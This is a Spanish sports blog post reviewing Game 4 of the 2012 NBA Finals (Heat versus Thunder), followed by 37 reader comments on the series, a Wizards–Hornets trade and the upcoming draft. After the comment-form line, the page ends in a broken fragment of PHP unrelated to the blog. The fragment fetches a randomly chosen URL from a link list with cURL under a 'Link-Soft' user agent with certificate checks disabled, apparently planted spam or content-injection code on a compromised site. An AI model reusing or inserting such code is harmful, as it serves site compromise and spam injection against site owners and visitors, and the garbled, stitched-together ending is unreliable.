La Crónica: A las puertas del Olimpo

20 de June de 2012 por TheDeerHunter

Como diría el Agente Smith: “Es inevitable”. “El Elegido” roza con sus dedos el ansiado título. Resulta altamente improbable que Miami pierda los 3 siguientes partidos. La diosa justicia baloncestística reconocerá por fin a su más hijo más ilustre y la “maldición de Dan Gilbert” quedará para los anales como la chorrada que fue en lugar de alimentar oscuras mitologías. Nos guste o no, si alguien ha merecido un anillo alguna vez, ese es LeBron este año. Es el mejor del mundo actualmente. Punto.

Es constante un alto grado de igualdad. Los Heat no pueden apabullar. Una vez más se resolvió todo en el último medio minuto. Soportaron el demoledor ímpetu inicial rival con desventajas rozando los 20, triturados por los contragolpes Thunder, y el partido antológico de Westbrook vestido de Michael Jordan. Tuvieron dos sustos en forma de posibles lesiones de LeBron y Wade. ¡Cómo hubiera dado la vuelta la tortilla en esa circunstancia!

Es curioso de donde surgen las micro-historias que engrandecen la mitología NBA. Brooks decidió proteger a Durant de su constante problema de faltas en estas finales y para ello le asignó la marca de Chalmers. “I took that as a little sign of disrespect” ha dicho él mismo. Un sentimiento de falta de respeto que se ha traducido en el partido de su vida. Eso es poner un circo y que te crezcan los enanos. Por un lado, los Heat logran involucrar a gente como él, Norris Cole o el mermado Bosh y los Thunder no alcanzan ni a Big Three, con un Harden totalmente superado y la inoperancia de los que no se llaman Westbrook ni Durant. Esta es la clave.

La otra es que James anote 26 puntos y asista para otros 29. Sólo 4 jugadores han logrado generar más puntos en un partido de una final en las últimas 15 temporadas. Jordan (58 en el 2º contra Jazz 1997), Iverson (61 en el primero vs Lakers 2001), Kobe Bryant (58 en el 1 vs Orlando 2009) y Shaquille O’Neal en otras dos ocasiones distintas (56 y 61 en 2001 y 2002). Hail to The King.

PREMIOS

MVP: Lebron James sabe que está ante la oportunidad de su vida de llevarse un anillo a casa y no piensa dejarla escapar. Se quedó a sólo 1 rebote del triple tras anotar 26 puntos, repartir 12 asistencias y capturar 9 rebotes. Dwyane Wade y Mario Chalmers, con 25 puntos cada uno fueron sus perfectos escuderos.

Rookie: Hoy sí que hay que destacar la actuación de Norris Cole, autor de 8 puntos en 8 minutos. Sus puntos ayudaron a recortar los 17 puntos de ventaja que consiguieron los Thunder.

Sorpresa: Mario Chalmers emergió en el último cuarto con 12 puntos, para un total de 25, más que sumando los que había conseguido en los 3 partidos anteriores.

Decepción: James Harden se está desinflando ante nuestros ojos. Con 8 puntos y un 2 de 10 en tiros de campo dejó nuevamente solos a Durant y Westbrook en el apartado anotador.

Esfuerzo en vano: Russell Westbrook anotó 43 puntos en el partido de su vida con un fenomanel 20 de 32 en tiros de campo. Además, capturó 7 rebotes y repartió 5 asistencias. Ni todo su esfuerzo, ni los 28 puntos de Kevin Durant, pudieron con los Heat.

Imágenes | AP Photos / Getty Images

Comenta

37 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Y estas tan esperadas Finales se nos acaban antes de lo que esperábamos… salvo otro vuelco milagroso
    Los Thunder se encuentran en situación desesperada y envueltos en un mar de dudas habiendo dado una vez más la sensación de ser demasiado inexpertos para las Finales. Demasiada ansiedad y dudas que van camino de costarles el título ¿Donde estas Harden????. Los Heat lo han sabido ver y están jugando su mejor baloncesto con contribuciones de todos, jugando en equipo y explotando fenomenalmente sus ventajas.
    Pero vayamos poco a poco. De salida unos enchufadísimos Thunder parecían haber comprendido cuales eran sus males. Mejor selección de tiro, agresividad, atacar rápido en transición compartiendo el balón en ataque, un Westbrook enchufado y fuerte defensa que les daban rápidas ventajas. Los Heat se vieron desbordados y a finales del primer cuarto la ventaja había subido a 17 puntos a favor de los Thunder. Entonces pasó lo inexplicable… En 4 minutos de locura los secundarios de los Heat dieron la vuelta al partido con un 19-2 en el que se vieron cosas que no estaban en ningún guión (8 puntos de Norris Cole con 2 triples, otro triple de James Jones, otro de Chalmers y otro más de Wade). La ventaja que tan bien habían construido los Thunder se había ido al garete en un momento.
    A partir de ahí se instaló la sensación de que los Heat iban a ganar el partido y casi siempre llevaron la iniciativa pudiendo acabar con el partido con comodidad. Con Durant incómodo ante las defensas de los Heat y Harden desaparecido el ataque de OKC empezó a pasar apuros para anotar y cada canasta les costaba un mundo. Mucho juego 1×1 ante un equipo tan físico como los Heat que empezaron a estar a gusto en ataque, compartiendo el balón con un Chalmers fenomenal aprovechando las ventajas que creaba LeBron jugando al poste contra Harden o Sefolosha y una vez más controlando el rebote. El partido se inclinaba del lado de Miami cuando Russell Westbrook decidió morir con las botas puestas. Él sólo se echó el equipo a la espalda y con una actuación increíble mantuvo a los Thunder con opciones remontando la desventaja y llegando a los 3 últimos minutos con el marcador empatado.
    Y llegados ahí de nuevo el clutch perteneció a Miami. Lo que antes de las Finales parecía una clara ventaja para OKC y que parecía confirmarse en los 2 primeros partidos ha dado un vuelco en estos 2 últimos. Los Thunder no están teniendo claridad de ideas en esos minutos finales, muy lastrados porque el jugador que suele tomar las decisiones y actuar de base en esos momentos que es Harden está totalmente fuera de las Finales. Sin él y con Durant muy incómodo ante LeBron muchas de las decisiones recaen en Westbrook o tiros forzados de Durant y ninguna de las dos cosas está funcionando. Enfrente los de Miami están jugando mucho mejor. Pick&Rolls con Wade y Bosh y jugadas para LeBron que a pesar de un conato de lesión metió un triple decisivo con el partido empatado. Tras otro mal ataque con pérdida de Durant, Wade entraría para poner 5 de ventaja. Todavía tendrían una última opción los Thunder pero Westbrook volvió a perder la cabeza y pecar de pardillo. Con 17 segundos y 3 abajo hay un salto entre dos. Los Heat ganan el salto pero el balón le queda encerrado en la esquina a Chalmers con sólo 4 segundos de posesión y Westbrook no se dá cuenta y hace falta sobre Chalmers que sentencia desde la línea. De nuevo inexperiencia y ansiedad para saber leer la situación.
    Por los Heat gran partido como equipo aunque parezca mentira decirlo con LeBron haciendo de todo (26-9-12) bien acompañado por Bosh y Wade (25-5-3) que hizo varias acciones defensivas decisivas en el último periodo y un estelar Chalmers con 25 puntos. Actuación destacada de Cole con 8 puntos casi seguidos en la remotada del segundo cuarto y de nuevo ganaron el rebote en un apartado que está siendo otra de las claves. Por los Thunder impresionante esfuerzo de Westbrook que se fue a 43 puntos con buena serie de tiro más 7 rebotes y 5 asistencias ayudado por un incómodo Durant (28 puntos) pero ambos están demasiado sólos y muy forzados en las jugadas finales porque la clave de estas finales está siendo el hundimiento de James Harden (de nuevo 2/10 para 8 puntitos con 4 pérdidas). Por ahí se les está yendo las Finales a OKC ya que les falta un jugador esencial que normalmente juega, hace jugar al equipo y mueve la bola en los instantes finales y que está totalmente desaparecido.
    Ahora Miami está claramente en control de las Finales y sólo si la lesión de LeBron le impide jugar (acabó tocado sin jugar las últimas posesiones) o una reacción furiosa de los Thunder podría darle la vuelta. OKC necesita desesperadamente a Harden para que su ataque vuelva a ser fluido y más imprevisible y en defensa no encuentran las soluciones ante las ventajas que crea LeBron para anotar o pasar a los tiradores que les están acribillando desde el triple. En estos PO hemos vivido grandes vuelcos y si OKC es capaz de ganar el 5º todavía habría final pero ahora mismo todo parece encaminado a la victoria de los Heat en el 5º. ¿Habrán dejado los Thunder de creer en sí mismos como parece o se reencontrarán en el 5º? Veremos si finalmente el Rey sube a su trono el jueves

      Citar

  2. simon dice:
    #2

    Puff me cuesta imaginar un escenario en el que los Thunder no ya remonten, sino que se lleven la serie a Oklahoma de nuevo ya me cuesta, espero equivocarme pues estas finales se merecían ser un poquito mas largas.

      Citar

  3. Jose Luis dice:
    #3

    Lo de Harden es increíble, vaya forma de desaparecer… es que no ha hecho ni un partido bueno.

    Y además los secundarios de Miami están apareciendo, cuando no es Battier es Chalmers, y hoy hasta Cole ha metido 8 puntos. En fin, esto se acaba al parecer, vaya partidazo de Westbrook, y Durant no sé, 19 lanzamientos me parecen pocos, creo que está un poco resignado a perder o a no poder meterle tantos puntos tan fácilmente a LeBron. Con un Harden normalito esto iría 2-2 o incluso 3-1 para OKC. Mucha suerte necesitan para volver a casa estando aún vivos.

      Citar

  4. GreenPride dice:
    #4

    La sensación por lo visto hasta ahora es que la serie acabará en el 5º pero si los Thunder son capaces de recuperar a Harden y volver a casa todo podría pasar. Hemos visto vuelcos que creíamos imposibles en estos Playoffs y no podemos descartar que pueda volver a pasar pero los Thunder necesitan un subidón moral que les limpie la cabeza de dudas.
    El problema es que los Heat parecen lanzados y han logrado involucrar a todos sus jugadores en roles importantes aunque sean secundarios mientras en OKC está fallando hasta un primer espada como Harden y además su defensa no está consiguiendo hacer frente a los Heat. Ir al rebote mucho más fuerte, que Harden vuelva a ser él y que su defensa pueda parar con consistencia el ataque Heat son sus prioridades pero a día de hoy parece difícil cumplir cualquiera de ellas, sobre todo las 2 últimas.
    Yo estoy deseando que los Thunder encuentren el punto para poder ganar el 5º porque si no las series legendarias que esperábamos no van a ser para tanto.
    Por cierto, quiero recordar que tras el primer partido hubo quien sostuvo aquí que era imposible que los Heat ganaran estas series y alguno pedimos un poco de respeto (aún apostando por OKC). Creo que ha quedado claro que no es tan fácil ganar a un equipo con tan buenos jugadores como los de Miami. Del mismo modo enterrar hoy a OKC podría ser un error. Yo creo que la serie está casi decidida pero LeBron y cia aún no tienen el anillo

      Citar

  5. Sancho88 dice:
    #5

    Me parece que el enlace está mal… habéis puesto el resumen del segundo juego. Saludos.

      Citar

  6. txusma dice:
    #6

    Sancho88:
    Me parece que el enlace está mal… habéis puesto el resumen del segundo juego. Saludos.

    Corregido! Gracias por el aviso

      Citar

  7. GreenPride dice:
    #7

    Por cierto, una cosa que se me había olvidado comentar. Brooks cambió la asignación de LeBron dándosela a Sefolosha desde el principio para evitar las faltas de Durant. Lo consiguió pero a cambio Chalmers se ha forrado a meter puntos…. y LeBron ha seguido metiendo de todos los colores. Yo mismo pedía ese cambio pero al final ha sido contraproducente para los Thunder. Visto la final ¿Durant de 4 desde el principio para que pueda defender a Battier y que Sefolosha coja a LeBron dejando a Ibaka sobre Bosh? Yo creo que es la única opción defensiva que puede dar algo de resultado a OKC. Para ello está claro que sentaría a Perkins y metería a Fisher pasando a Westbrook de escolta. Es un cambio arriesgado pero está claro que Oklahoma necesita un dar un giro radical a las series

      Citar

  8. melo15 dice:
    #8

    Para mi la clave de las Finales ha sido y esta siendo, quien defiende a Lebron.
    En los 2 primeros empezo Durant, pero se demostro que secargaba demasiado rapido de faltas, despues provo con Harden pero se demostro que no puede aguantarle en el poste. La opcion correcta me parece Sefolosha es verdad que sufre en el poste pero es el que mas incomoda a Lebron.

      Citar

  9. Esteban dice:
    #9

    creo que todos hemos sobreestimado al thunder, quiza por que ya tenian dos finales de conferencia jugadas, frente a veteranisimos equipos con spurs y mavs, creimos que no eran inexpertos, y nos equivocamos

    harden no ha podido con la presion sobre sus espaldas en toda la serie, y este ha sido el factor X, salvo el juego 2, el resto de los partidos, la barba se ha ido con porcentajes mas cercanos al 20% que al 50%, y siendo la unica via de gol que no sean westbrook y durant es mucho decir

    algo similar le ha pasado a durant e ibaka que se han metido en problemas de faltas, muchas veces tontas y buscadas por el heat, deberian haber sabido que es preferible que les anoten en la cara antes de mirar el partido desde el banco

    y otro factor X de esta serie han sido los jugadores de rol del heat, james y wade son los unicos dos grandes de ese equipo y hacen bien en notarlo, a bosh le a tocado jugar de definidor de pases en cortada o de tiros abiertos, pero olvidado definitivamente de ser la tercer espada, como jugador de rol es superior a cualquiera de la nba, como tercer espada ya hemos visto que deja mucho que desear, mientras que battier solo tiene que lanzar los tirples cuando queda solo y los mete todos, y chalmers sin ningun tipo de presion, demuestra que es un buen base y que el heat no tiene un aguero en esa posicion

    los planetas se alinearon y creo que esto se definio, bien por LBJ, que empieza a redescribir su historia en la nba, con un anillo, las finales perdidas no se ven como “perdidas” sino como llegadas, y la anterior sumada a esta parecen lograr cierta dinastia,
    su anillo le llega a los 27 años, con ese fisico le quedan 3 años mas en plenitud, ya he dicho no me gusta verle jugar, pero cuidado que no termine por compararse con jordan

      Citar

  10. melo15 dice:
    #10

    Y porque 3 años?? Jordan jugo hasta los cuarenta.

      Citar

  11. txusma dice:
    #11

    melo15:
    Y porque 3 años?? Jordan jugo hasta los cuarenta.

    Ya digo. Actualmente los jugadores aguantan hasta los 33 sin problemas. Yo creo que puede hacer 5 temporadas promediando números similares a los de ahora.

      Citar

  12. Ru dice:
    #12

    Yo todavía no me fio de Oklahoma,ya he visto en estos PO’s muchas cosas que parecían cerradas o con un destino escrito y de repente cambiar todo el guión,así que soy muy cauto en ese sentido,más cuando ha llegado esa lesión de LeBron,aunque no me creo que se baje ahora que está tan cerca su ansiado anillo y jugará aunque sea en muletas.Otra cosa es que eso sea positivo para su equipo…pero bueno,supongo que se recuperará bien.

    Westbrook partidazo,si señor,aunque creo que será un “nuevo LeBron” en el sentido de que va arrastrar una serie de críticas bastante tiempo cuando ha demostrado que es el base que necesita ese equipo.Tiempo al tiempo.Y Harden…factor clave en la serie.Pensando en el futuro le va hacer daño para su renovación aunque es un jugador fuera de clase.

    Hay un dato sobre LeBron que es impresionante (leído en nbamaniacs). Sólo Larry Bird y Barkley sumaron 600 puntos,200 rebotes,100 asistencias en unos PO’s.LeBron se unió esta noche a ese grupo y en su caso con 650 puntos.Bird son palabras mayores,pero Barkley nunca tuvo un anillo y ya sabemos la estima que se le tiene en los ránkings (tengo ganas de picar,jajaj).Por lo demás espero que de consumarse el título para Miami no se diga que es el triunfo del “Big Three” porque secundarios como Battier y Chalmers,Bosh jugando como si su status fuera el de la clase media,Wade de perfecto escudero….Miami ha encontrado su mejor juego de equipo cuando ha tenido al LeBron más maduro.

      Citar

  13. Melo15 dice:
    #13

    Tan bueno era Barkley que se puede compararncon Bied. Yo esque no me sonaba mucho.
    Alguien me puede explicar quien era? Que hizo?

      Citar

  14. Jose Luis dice:
    #14

    @Melo15

    http://es.wikipedia.org/wiki/Charles_Barkley

    Aunque supongo que alguno del blog tendrá algún artículo a mano, de este u otros blogs, sobre Charles Barkley

      Citar

  15. Esteban dice:
    #15

    Digo 3 años en maximo nivel por el estilo de juego de lebron, es muy fisico, algo parecido a gerald wallace, con los aÑos se notara la falta de explosividad

    Jordan jugo mas años por q se transformo, dejo de volar y se hizo un jugador mas terranal, muy parecida la transformacion que hizo kobe

    Pareciera que a lebron le va a costar por como juega, transformarse en un jugador mas tirador q penetrador

      Citar

  16. HeiNeKeN dice:
    #16

    En otro orden de cosas… Los Wizards traspasan a Lewis por Ariza y Okafor de New Orleans Hornets

      Citar

  17. melo15 dice:
    #17

    Pues no lo entiendo, Ariza es un jugador muy similar a Kidd-Gilchrist, sera que los Wizards apostaran por otro jugador??
    De todas maneras buen traspaso para los Wizards

      Citar

  18. Ru dice:
    #18

    El pick de Wizards (46) también se va a New Orleans.

    Buen trade para NOLA que liberan un contratazo esta próxima temporada para seguir reconstruyendo.Se libran de dos jugadores con contratos incómodos para ellos.Además mantendrán su pick 10 ya que se rumoreaba que iban a moverlo para traspasar a Okafor.

    Para Wizards…si consiguen que vulevan a ser jugadores de baloncesto bien,si no…no lo veo muy claro.Ariza,ese jugador que parecía una roca defendiendo y que se ha disuelto como un azucarillo.Parece claro que la elección de Wizards será un escolta,Beal puede ser su elección.

      Citar

  19. Pop dice:
    #19

    Melo15: Tan bueno era Barkley que se puede compararncon Bied. Yo esque no me sonaba mucho.Alguien me puede explicar quien era? Que hizo?

    Imagínate a un PF con la explosividad de B.Griffin, la muñeca de Kevin Love y la agresividad de Kevin Garnett. La labia de Shaq también podrías incluirla. Mételo en un cuerpo orondo de 1’95 y agita el cotctel.

      Citar

  20. Esteban dice:
    #20

    Ru:
    El pick de Wizards (46) también se va a New Orleans.

    Buen trade para NOLA que liberan un contratazo esta próxima temporada para seguir reconstruyendo.Se libran de dos jugadores con contratos incómodos para ellos.Además mantendrán su pick 10 ya que se rumoreaba que iban a moverlo para traspasar a Okafor.

    Para Wizards…si consiguen que vulevan a ser jugadores de baloncesto bien,si no…no lo veo muy claro.Ariza,ese jugador que parecía una roca defendiendo y que se ha disuelto como un azucarillo.Parece claro que la elección de Wizards será un escolta,Beal puede ser su elección.

    lo veo bien para NOH, se me hace que ficharan a davis y a sullinger si los rumeros de sus problemas en la espalda no reusltan tan ciertos, asi ya tendrian su juego interior armado, y se liberan de nada menos que 20 millones!!!!!!!!!!!

    no entiendo bien que quieren los wizards, ya tienen a nene, sumarle a okafor, lo obligaria a jugar de 4 desp de las lesiones y los años no me parece lo mas sabio,
    sin dudas quieren competir ya y arman un juego interior fuerte para el este, rodear de hombres con experiencia a wall me parece bien,, pero el contrato de okafor es muy muy pesado

    igualmente si alguien podia asudmir dicho contratazo eran los wizars, que tenian comprometidos solo 40 millones para la proxima temporada con el equipo medio armado, sin dudas se decantaran por un alero, barnes o kidd es la cuestion,

    no se soprendan su buscan un trade por vasely a cambio de un escolta, seria lo mas sabio, vasely aun puede rendir, pero con kidd por delante en el puesto de alero y nene en el puesto de pivot, parece no tener lugar para desarrollarse

      Citar

  21. Esteban dice:
    #21

    consulta, segun hispanosnba pasa lo siguiente

    En principio, los Hornets cortarían, probablemente de forma inmediata, a Lewis, que tiene la próxima temporada un contrato no garantizado de 22,7 millones de dólares, una auténtica locura a tenor de su rendimiento. Eso sí, para quitárselo de encima New Orleans deberá abonar al jugador alrededor de 13,7 millones de dólares.

    esos 13.7 millones siguen entrando en el tope o se lo pagan y no cuenta?

      Citar

  22. jose antonio ramirez dice:
    #22

    Esteban:
    consulta, segun hispanosnba pasa lo siguiente

    En principio, los Hornets cortarían, probablemente de forma inmediata, a Lewis, que tiene la próxima temporada un contrato no garantizado de 22,7 millones de dólares, una auténtica locura a tenor de su rendimiento. Eso sí, para quitárselo de encima New Orleans deberá abonar al jugador alrededor de 13,7 millones de dólares.

    esos 13.7 millones siguen entrando en el tope o se lo pagan y no cuenta?

    Segun el nuevo convenio, no pueden cortar a lewis, no se muy bien porque ahora mismo pero lo he leido de pasada en algun medio, asi que olvidemosnos de que los hornets cortaran a lewis, insisto no pueden

      Citar

  23. jose antonio ramirez dice:
    #23

    Aunque lo que tu dices esteban, si que puede pasar ahora que lo pienso bien, lo que no pueden hacer es amnistiarlo

      Citar

  24. Esteban dice:
    #24

    jose antonio ramirez:
    Aunque lo que tu dices esteban, si que puede pasar ahora que lo pienso bien, lo que no pueden hacer es amnistiarlo

    si amnistiarlo pueden tambien, pueden aplicarse a cualquier contrato firmado antes del nuevo convenio y el de lewis es anterior, sucede que se puede utilizar solo una vez y pudiendo cortar el contrato no garantizado de lewis, me parece un desperdicio usarla en el, aunque los hornets, sin okafor no tienen contratos como para aplicar la amnistia, todos son cortos y bajos

      Citar

  25. Esteban dice:
    #25

    se romorea que los wizards se quedaran con beal ya que tienen a ariza y a vasely, yo creo que de estar disponible intentaran sumar a kidd, no me parece que beal este a la altura de un tercer pouesto en este draft

    yo ficharia a kidd, e intetaria un trade vasely por evans, ya que es evidente que los kings no lo quiere y necesitan un alero

      Citar

  26. Esteban dice:
    #26

    de acuerdo a nuevos acontecimientos y comentarios se empiezan a deifinir los primeros 5 puestos del draft,
    davis es el uno

    los bobcats estarian interesados en el poder de gol de robinson como para dejarlo pasar
    el trade de wizards estaria dirigiendo la tercer colocacion a beal, a mi juicio un error

    cavs esta entre barnes y kidd-gilchrist, barnes tenia un entrenamiento esta semana con kings pero lo cancelo, lo que significaria que los cavs le han prometido su seleccion en el cuarto lugar
    y kidd-gilchrist caeria hasta el 5 puesto, los klings no pueden dejarlo pasar, demasiado tentador, aunque me hubiese gustado ver una dupla drummond-cousins

    el sexto puesto parece decidido para portland y se llevarian a drummond, le falta mucho es cierto y los blazers son un equipo donde se le exigira mucho de entrada, pero un jugador tan inmaduro como el, tiene suerte de caer en una franquicia con aspiraciones, en unos bobcats, realmente podria echarse a perder y perder motivacion por mejorar

      Citar

  27. simon dice:
    #27

    Esteban yo creo que el mejor sitio donde podría caer Drummond sería Portland, se le exigiria compromiso defensivo e intensidad pero no se le exigiria gran responsabilidiad en ataque y podría ir madurando poquito a poquito, al lado de aldridge y con los espacios que este crea podría ser un 13-10 y 2 tapones por partido.

      Citar

  28. txusma dice:
    #28

    Beal sí que se merece un número 3 del draft y el equipo de Wizards me parece más que interesante. NOH pilla a Davis y mucho espacio salarial. Lo harán tan mal este año que tendrán otra buena elección.

      Citar

  29. Ru dice:
    #29

    simon:
    Esteban yo creo que el mejor sitio donde podría caer Drummond sería Portland, se le exigiria compromiso defensivo e intensidad pero no se le exigiria gran responsabilidiad en ataque y podría ir madurando poquito a poquito, al lado de aldridge y con los espacios que este crea podría ser un 13-10 y 2 tapones por partido.

    Estoy contigo simon,y eso que en Portland deben estar circulando las camisas de fuerza cual manicomio al barruntarse la posibilidad de escoger otro center en las primeras posiciones del draft,pero es lo que hay xDD parece muy claro de todas formas lo que van a escoger,si llega al 6,a Drummond,si no…anotador de fuera (visto lo visto sería Lillard) y un center en el 11 (Meyers Leonard o Zeller).Si cogen a Drummond con el 6,escogerán un anotador con el 11(Terrence Ross que es de Portland o Austin RIvers).

    @txusma: coincido también contigo.Es la elección que deberían hacer los Wizards ya que es la posición peor cubierta.Además la ética de trabajo y la cabeza de Beal parece adecuada para el color “profesional” que están cogiendo los Wizards aunque sigue estando Blatche por ahí.Wall se va a encontrar con su prueba de fuego este año.

      Citar

  30. Ru dice:
    #30

    A todo esto……con las noticias,rumores que van surgiendo…..¡Meloooooooooo!ve currándote un mock draft 3.0 para los días previos al draft 😛

      Citar

  31. txusma dice:
    #31

    Ru:
    A todo esto……con las noticias,rumores que van surgiendo…..¡Meloooooooooo!ve currándote un mock draft 3.0 para los días previos al draft :P

    Lo prometió, no podrá esconderse. Y nada de elecciones múltiples!!

      Citar

  32. melo15 dice:
    #32

    No me voy a esconder, de hecho ya estoy en ello. Aunque tengo una duda Kidd-Gilchrist o Beal en la tercera posicion??

      Citar

  33. Txusma dice:
    #33

    melo15:
    No me voy a esconder, de hecho ya estoy en ello. Aunque tengo una duda Kidd-Gilchrist o Beal en la tercera posicion??

    Después del trade de Ariza, yo creo que los Wizards pillan a Beal, lo q traslada la duda a la 4a elección: Barnes o Kidd a los Cavs? Esa te la dejo a ti. 😀

      Citar

  34. simon dice:
    #34

    Increible 5 partido de Miami quedan 5 minutos y estamos viendo minutos de la basura desde hace rato…
    Lebron ya va a tener su anillo, increibles finales de este. En cuanto a Oklahoma viendo ahora la final en conjunto creo que le ha llegado la final demasiado pronto, alguien lo comentaba ayer que muchos pensamos que estaban preparados pero la final les ha llegado muy pronto, tambien hay que decir que este año con Miami y Lebron a este nivel en las finales ningun equipo les hubiera ganado.
    ENhorabuena a Miami y a Lebron por su primer anillo.

      Citar

  35. simon dice:
    #35

    Madremia en este equipo hay unos cuantos anillos regalados… en fin ya comentaremos mas profundamente mañana…

      Citar

  36. GreenPride dice:
    #36

    Pues se acabó la temporada con la coronación del Rey. Anoche simplemente no hubo partido porque los Thunder dejaron de creer en ellos. Sólo Durant salió a pelear el partido y fueron un verdadero coladero atrás incapaces de frenar a unos enrachados Heat. Enhorabuena a los campeones que al contrario que el resto de PO creo que han jugado unas finales fenomenales. Luego más en su post

      Citar

  37. Vader dice:
    #37

    Enhorabuena LeBron, se lo merece. El año que viene toca el de Melo… 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>